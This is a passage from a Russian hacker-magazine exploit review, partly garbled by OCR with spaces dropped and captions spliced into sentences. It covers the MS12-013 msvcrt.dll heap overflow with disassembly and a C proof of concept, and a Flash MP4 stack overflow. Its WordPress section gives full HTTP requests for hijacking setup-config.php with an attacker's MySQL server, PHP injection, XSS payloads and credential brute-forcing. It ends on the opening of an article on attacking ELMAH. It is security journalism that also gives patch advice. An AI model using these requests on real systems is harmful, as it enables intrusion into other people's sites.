книги хакеры / журнал хакер / 159_Optimized

MS12-013:Уязвимостьвбиблиотекевремени

1выполненияC(msvcrt.dll)

(AV:N/AC:M/AU:N/C:C/I:C/A:C)

BRIEF

Msvcrt.dll — многопоточная библиотека динамической компоновки (DLL) времени выполнения C, которая используется компонентами системного уровня. В способе расчета библиотекой msvcrt.dll размера буфера в памяти существует уязвимость, которая делает возможным удаленное выполнение кода и позволяет копировать данные в память, не выделенную должным образом. Эта уязвимость делает возможным удаленное выполнение кода при запуске пользователем специально созданных файлов мультимедиа. Если пользователь вошел в систему с правами администратора, то злоумышленник, которому удалось воспользоваться уязвимостью, может установить полный контроль над системой, после чего он сможет устанавливать программы, просматривать, изменять и уничтожать данные или создавать новые учетные записи с неограниченными правами. Риск для пользователей, учетные записи которых имеют ограниченные права, меньше, чем для пользователей, работающих с правами администратора.

EXPLOIT

Патч от MS затрагивает функцию __check_float_string(). В связи

стем, что библиотека времени выполнения C поставляется в виде исходников совместно с MS Visual Studio, посмотреть на вышеупомянутую функцию можно в VC/CRT/src/input.c.

Логика работы у функции __check_float_string() следующая. С самого начала у библиотеки времени выполнения имеется буфер статического размера (_TCHAR floatstring[_CVTBUFSIZE + 1];). Как только требуется буфер большего размера, происходит перераспределение памяти. Порядок подобного перераспределения таков: выделяется удвоенный размер буфера и удваивается значение переменной, содержащей этот размер. При первой итерации увеличения используется вызов функции

calloc(), далее используется recalloc(). Основной момент, в связи

скоторым имеет место быть MS12-013, состоит в попытке записи нового размера буфера.

Ниже приведен дизасм-листинг старой версии msvcrt.dll:

.text:6FFBEA1E loc_6FFBEA1E: ; CODE XREF: sub_6FFBE9F3+25|j

.text:6FFBEA1E push 2

check_float_stringизCRT

.text:6FFBEA20 push ebx ; mov ebx, [esi] in the entry block

.text:6FFBEA21 call __calloc_crt

.text:6FFBEA26 pop ecx

.text:6FFBEA27 pop ecx

.text:6FFBEA28 mov [edi], eax

.text:6FFBEA2A test eax, eax

.text:6FFBEA2C jz short loc_6FFBEA1A

.text:6FFBEA2E push [ebp+pulResult] ; size_t

.text:6FFBEA31 mov eax, [ebp+arg_8]

.text:6FFBEA34 push [ebp+arg_4] ; void *

.text:6FFBEA37 mov dword ptr [eax], 1

.text:6FFBEA3D push dword ptr [edi] ; void *

.text:6FFBEA3F call _memcpy

.text:6FFBEA44 mov eax, [esi]

.text:6FFBEA46 push esi ; pulResult

.text:6FFBEA47 add eax, eax ; !!!!

.text:6FFBEA49 push 2 ; int

.text:6FFBEA4B push eax ; int

.text:6FFBEA4C mov [esi], eax

.text:6FFBEA4E call ?SizeTMult@@YAJIIPAI@Z

; SizeTMult(uint,uint,uint *)

.text:6FFBEA53 add esp, 18h

.text:6FFBEA56 test eax, eax

.text:6FFBEA58 jge short loc_6FFBEA78

Обрати внимание на аргументы функций __calloc_crt() и SizeTMult(). В момент вызова __calloc_crt() мы имеем следующий набор аргументов: __calloc_crt(Size, 2). Однако в момент, когда для записи переменной размера вызывается функция SizeTMult, ее набор аргументов выглядит так:

SizeTMult(Size*2, 2, &pResult)

Посему, несмотря на реальный размер выделенной памяти под буфер в Size*2, в переменную размера сохраняется значение Size*2*2. В связи с этим переполнение кучи происходить будет, но - за пределами рассматриваемой функции.

А это пропатченная версия. Вновь посмотрим на аргументы SizeTMult(). В этот раз имеем SizeTMult(Size, 2, &pResult). В итоге MS пришлось избавиться от инструкции «add eax, eax»:

.text:6FFBF935 push [ebp+pulResult] ; size_t

.text:6FFBF938 mov eax, [ebp+arg_8]

.text:6FFBF93B push [ebp+arg_4] ; void *

.text:6FFBF93E mov dword ptr [eax], 1

.text:6FFBF944 push dword ptr [esi] ; void *

.text:6FFBF946 call _memcpy

.text:6FFBF94B push edi ; pulResult

.text:6FFBF94C push 2 ; int

.text:6FFBF94E push dword ptr [edi] ; int

.text:6FFBF950 call ?SizeTMult@@YAJIIPAI@Z ; SizeTMult(uint,uint,uint *)

.text:6FFBF955 add esp, 18h

POC для MS12-013:

#include <windows.h> #include <stdio.h>

#pragma comment(linker, "/NODEFAULTLIB:msvcrt90.lib") #pragma comment(linker, "/NODEFAULTLIB:msvcrt80.lib")

#pragma comment(lib, "vs6/msvcrt.lib")

#define BUF_SIZE 0x300

void main( void )

{

char *pStr;

float f;

int i;

pStr = (char*)malloc(BUF_SIZE);

memset(pStr, 0, BUF_SIZE);

strcpy(pStr, "1.");

for( i=1; i<=BUF_SIZE-10; i++)

{

strcat(pStr, "0");

}

printf("Before scanf()\n");

sscanf(pStr,"%f", &f);

printf("After scanf()\n");

printf("%f\n", f);

}

TARGETS

Windows Vista, Windows Server 2008, Windows 7, Windows Server 2008

SOLUTION

Существует обновление, устраняющее данную уязвимость

.

AdobeFlashPlayer:переполнениебуферапри

2 обработкеMP4в

SequenceParameterSetNALUnit

(AV:N/AC:L/Au:N/C:C/I:C/A:C)

BRIEF

10февраля2012годавсоставеmetasploit-апоявилсяновыймодуль, отвечающийзауязвимостьвобработкеmp4-файлов,котораяосу- ществляетсякомпонентомFlash10u.ocxAdobeFlashPlayer.Ошибка располагаетсявsequenceParameterSetNALUnit.Когдапроисходит обработказначенияnum_ref_frames_in_pic_order_cnt_cycle,размеркопируемыхданныхникакнепроверяется,ипроцессFlash’а бездумнокопируетподконтрольныепользователюданныеиз offset_for_ref_frameвбуферфиксированногоразмера,располагающийсянастеке.Врезультатеэтоприводиткудаленномувыполнениюпроизвольногокодавконтекстепользователя,запустившего процессFlash-а.Многочисленныесообщенияобэтойуязвимости такжеуказываютнато,чтоонаактивноиспользоваласьITW.

EXPLOIT

Дизасмуязвимогоместа(функцияsub_1005B396),Flash10u.ocx 10.3.181.34:

.text:1005B4D7 loc_1005B4D7:

; CODE XREF: SubParseSeqParameterSet+157|j

ФункцияSubReadUExpGlomb()читаетизфайлаэкспоненциальныйкодГоломбаидекодируетеговбеззнаковоечисло. SubReadSExpGlomb()читаетэкспоненциальныйкодГоломбаидеко-

дируетеговзнаковоечисло.ФункцияSubReadBit()производитчтение одногобита.Каквидишь,ввышеприведенномкоденепроизводится никакихпроверокназначениеnum_ref_frames_in_pic_order_cnt_ cycle.ВдобавокковсемуFlashPlayerнеиспользуеттакойзащитный механизмкакstackcookies,поэтомуатакующийможетполучить контрольнадрегистромeipбезкаких-либопроблем.

TARGETS

AdobeFlashPlayer<=10.3.181.36

SOLUTION

Обновитьсядоверсии10.3.183.5

3 МножественныеуязвимостивWordPress

(AV:N/AC:L/Au:N/C:P/I:P/A:P)

BRIEF

В конце января компания Trustwave SpiderLabs в лице исследователя Джонатана Клаудиуса (Jonathan

Параметры,принимаемыескриптомsetup-config.php,никакнефильтруются

Claudius) опубликовала очередную пачку уязвимостей в движке WordPress. Среди них - исполнение произвольного PHP-кода, множественные XSS-уязвимости, а также раскрытие имени пользователя и пароля для подключения к серверу MySQL.

EXPLOIT

1.ИсполнениепроизвольногоPHP-кодаихранимаяXSSвскрипте setup-config.php.Сценарийисполняетсявпроцессеинсталляции WordPressипозволяетустанавливатьдвижоксиспользованиемлокальнойилиудаленнойбазыданныхMySQL.Дляэтогонеобходимо располагатьвалиднымиреквизитамидлядоступакMySQL.Однако злоумышленникможетподнятьсвойсобственныйсерверMySQL

ииспользоватьеговпроцессеустановки,приэтомнерасполагая логином/паролемкMySQLнацелевойсистеме.ПослеуспешнойинсталляцииWordPressзлоумышленникможетвнедритьпроизволь- ныйPHP-кодчерезредактортемWordPress.Вдополнениекэтому, благодарядоступукбазеданныхWordPressстановитсявозможным внедритьпроизвольныйJavascript-кодвконтентдвижка,темсамым реализуяуязвимостьхранимойXSS.

Атакапроводитсяследующимобразом.Допустим,A.B.C.D-целевой серверсWordPress,аW.X.Y.Z-серверзлоумышленникасустанов- леннойMySQL.

ПосылаемPOST-иGET-запросыдляустановкиWordPressсисполь- зованиембазыданныхзлоумышленника:

POST-запрос

POST /wp-admin/setup-config.php?step=2 HTTP/1.1

Host: A.B.C.D

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6;

rv:8.0.1) Gecko/20100101 Firefox/8.0.1 Accept: text/html,application/xhtml+xml,

application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5

Accept-Encoding: gzip, deflate

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

Proxy-Connection: keep-alive

Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1

Cookie: wp-settings-time-1=1322687480;

wp-settings-1=m9%3Do

Content-Type: application/x-www-form-urlencoded

Content-Length: 81

dbname=wordpress&uname=jsmith&pwd=jsmith&dbhost=W.X.Y.Z

&prefix=wp_&submit=Submit

GET-запрос

GET /wp-admin/install.php HTTP/1.1

Host: A.B.C.D

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X

10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1

Accept: text/html,application/xhtml+xml,

application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

Proxy-Connection: keep-alive

Referer: http://A.B.C.D/wp-admin/setup-config.php?step=2 Cookie: wp-settings-time-1=1322687480;

wp-settings-1=m9%3Do

If-Modified-Since: Wed, 07 Dec 2011 16:03:33 GMT

С помощью редакторатемWordPress редактируемфайл404.php (илилюбой другой, доступныйвиспользуемой теме), темсамым реализуявозможностьисполнения PHP-кода:

<?php

phpinfo();

?>

Исполняем код с помощью GET-запроса илипростооткрывстраницув браузере:

GET /wp-content/themes/default/404.php HTTP/1.1

Host: A.B.C.D

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X

10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1

Такжезлоумышленникможет использоватьхранимую XSSдля атакина пользователей, —дляэтогонеобходимо выполнить такой запрос:

UPDATE wp_comments SET

comment_content='<script>alert('123')</script>' where comment_content='Hi, this is a comment.<br />To delete a comment, just log in and view the post's comments. There you will have the option to edit

or delete them.';

Когдапользовательзайдетпоссылке,указаннойвследующемGET- запросе,вегобраузеревыполнитсявнедренныйJavascript-код:

GET /?p=1 HTTP/1.1

Host: A.B.C.D

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X

10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1

2.Множественные XSS вскриптеsetup-config.php. В процессеинсталляции злоумышленникможет внедрить Javascript-кодчерез параметры«dbname»,«dbhost»или «uname». Этореализуется черезследующийPOST-запрос:

POST /wp-admin/setup-config.php?step=2 HTTP/1.1

Host: A.B.C.D

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X

10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1

Accept: text/html,application/xhtml+xml,

application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

Accept-Encoding: gzip, deflate

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

Proxy-Connection: keep-alive

Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1

Content-Type: application/x-www-form-urlencoded

Content-Length: 112

dbname=%3Cscript%3Ealert%28%27123%27%29%3C%2Fscript%3E&

uname=root&pwd=&dbhost=localhost&prefix=wp_&submit=Submit

3. Раскрытиереквизитовдлядоступа кбазе данныхMySQL через скриптsetup-config.php. Впроцессеинсталляции пользователь задаетпараметрыбазыданныхMySQL, как ужеобсуждалось ранее. Привводенеправильныхреквизитовскриптвыдает ошибку,чем иможновоспользоваться, осуществляя брутфорсимени пользователяипароля кMySQL, причемнетолько локальной, нои любой удаленной.Запросвыглядитследующимобразом:

POST /wp-admin/setup-config.php?step=2 HTTP/1.1

Host: A.B.C.D

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X

10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1

Accept: text/html,application/xhtml+xml,

application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5

Accept-Encoding: gzip, deflate

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

Proxy-Connection: keep-alive

Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1

Content-Type: application/x-www-form-urlencoded

Content-Length: 32

uname=user&pwd=pass&dbhost=L.M.N.O

В нем делаетсяпопытка коннекта ксерверу L.M.N.Oпользователемuser и паролем pass.

TARGETS

WordPress 3.3.1иболееранние.

SOLUTION

Таккакуязвимыйскрипт-инсталляционный,разработчики WordPressпосчиталивозможностьреализацииэтихуязвимостей крайнемалойинесталивыпускатьофициальныхпатчей.«Ниодин нормальныйпользовательнебудетоставлятьинсталляционных скриптовусебянасервереилипрерыватьпроцессустановки»,- считаютони.Однаконекоторыехостинговыекомпаниипредоставляютаккаунты,вкоторыхпоумолчаниюприсутствуютдистрибутивы WordPressсустановочнымискриптами,аклиентихможетдажеине планировалиспользовать.Длязащитысвоихсерверовотэтихатак можнопорекомендоватьлишьпользоватьсясложнымипаролямик MySQL,атакжеиспользоватьWAF,например,ModSecurity,вправилах которогоучтеныподобногородаатаки.z

ТЕМНАЯСТОРОНА ТРАССИРОВКИ

DVD

Нанашемдиске тынайдешь исходникуязвимого приложенияMusic Store

Одним из инструментов, применяемых для поиска и исправления ошибок в программах, являются отладчики и трассировщики

— специальные утилиты, выполняющие программу по шагам, чтобы понять, что вообще происходит. Сегодня речь пойдет о взломе ELMAH — популярного средства для трассировки ASP.NET-приложений.

Web-интерфейслогаELMAH

НЕМНОГО ОБ ОТЛАДЧИКАХ

Использование отладчика — это гарантия того, что ошибка будет как минимум обнаружена и, если повезет, исправлена. Но, к сожалению, существует множество ситуаций, когда программист не может прибегнуть к помощи этого мощного средства. Во-первых, не все ошибки можно отладить. Классический пример — тупиковые ситуации (deadlock) в многопоточном приложении: запускаешь приложение в отладчике — все работает, без него — программа «падает». Во-вторых, отладчик не всегда доступен. Например, тебе никто не разрешит устанавливать средства разработки на сервере высоконагруженного web-приложения. Или другой пример: я уверен на 99%, что ты не найдешь отладчик на компьютере бухгалтера Мариванны, которая использует твою «складскую» программу. Тут встает резонный вопрос: а что делать-то? Ответ нашли еще на заре появления компьютерной техники: трассировка — это получение информационных сообщений во время выполнения программы: какие были исключения, что ввел пользователь, чем программа занимается в данный момент и так далее. Средства трассировки приложений — это очень мощные, но в то же время и потенциально опасные инструменты, ведь они могут предоставить много полезной информации для хакеров. Такие «ошибки» особенно широко распространены в корпоративном софте, который пишется для внутренних нужд компаний. Программисты в корпорациях

Каквидишь,настраницепоискаальбомавозможнаSQL-инъекция

стараются сделать жизнь службы поддержки (да, собственно, и свою) как можно проще, поэтому чаще всего доступ к различным системным сообщениям и трассировке неограничен. Зачем

усложнять систему, когда доступ извне защищают бравые парни из службы безопасности? А об инсайдерах, как обычно, забыли, хотя, если верить статистике, 80% успешных взломов корпоративных систем производится именно ими.

ЧТО ТАКОЕ ELMAH?

ELMAH (расшифровывается как Error Logging Modules and Handlers) — это продукт с открытым исходным кодом, разработанный Атифом Азизом (Atif Aziz). Данная система облегчает задачу регистрации и мониторинга необработанных исключений в приложениях, разработанных на ASP.NET. Несмотря на свою молодость (ELMAH 1.1 был зарегистрирован в репозитории NuGet 11 января 2011 года), проект очень популярен в среде разработчиков сайтов под .NET. На момент написания статьи он находился на четырнадцатой строчке среди пакетов, доступных в NuGet, а библиотеку скачали 45 583 человека.

Секрет популярности ELMAH кроется в его простоте. Интеграция с любым web-приложением происходит при помощи всего нескольких щелчков мышки: добавляешь библиотеку в проект при помощи NuGet и готово! Кроме того, если ты захочешь использовать ELMAH с уже существующим кодом, то тебе не потребуется заново его компилировать! Просто скопируй необходимые сборки в проект и подправь Web.config. Все заработает на ура. Несмотря на простоту использования, ELMAH обладает богатым функционалом: здесь присутствует возможность сохранения информации об ошибках в различные базы данных, существуют сервисы уведомления разработчиков по электронной почте или через RSS и так далее.

Угоняемсессиюпользователя